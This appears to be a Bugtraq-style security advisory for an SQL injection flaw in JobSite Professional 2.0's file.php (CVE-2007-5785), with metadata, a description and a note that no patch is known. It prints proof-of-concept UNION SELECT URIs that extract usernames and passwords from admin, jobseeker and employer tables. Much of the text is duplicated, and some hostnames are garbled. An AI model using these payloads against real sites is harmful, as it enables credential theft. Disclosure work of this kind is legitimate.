JobSite Professional File.PHP SQL injection Vulnerability
BID:26225
Info
JobSite Professional File.PHP SQL injection Vulnerability
| Bugtraq ID: | 26225 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5785 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 29 2007 12:00AM |
| Updated: | Mar 19 2015 09:35AM |
| Credit: | ZynbER is credited with the discovery of this vulnerability. |
| Vulnerable: |
NetArt Media JobSite Professional 2.0 |
| Not Vulnerable: | |
Discussion
JobSite Professional File.PHP SQL injection Vulnerability
JobSite Professional is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this vulnerability could permit remote attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks.
JobSite Professional 2.0 is vulnerable; other versions may also be affected.
JobSite Professional is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this vulnerability could permit remote attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks.
JobSite Professional 2.0 is vulnerable; other versions may also be affected.
Exploit / POC
JobSite Professional File.PHP SQL injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*
Solution / Fix
JobSite Professional File.PHP SQL injection Vulnerability
Solution:
Currently we are not aware of any patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
JobSite Professional File.PHP SQL injection Vulnerability
References:
References:
- JobSite Professional Homepage (NetArt Media)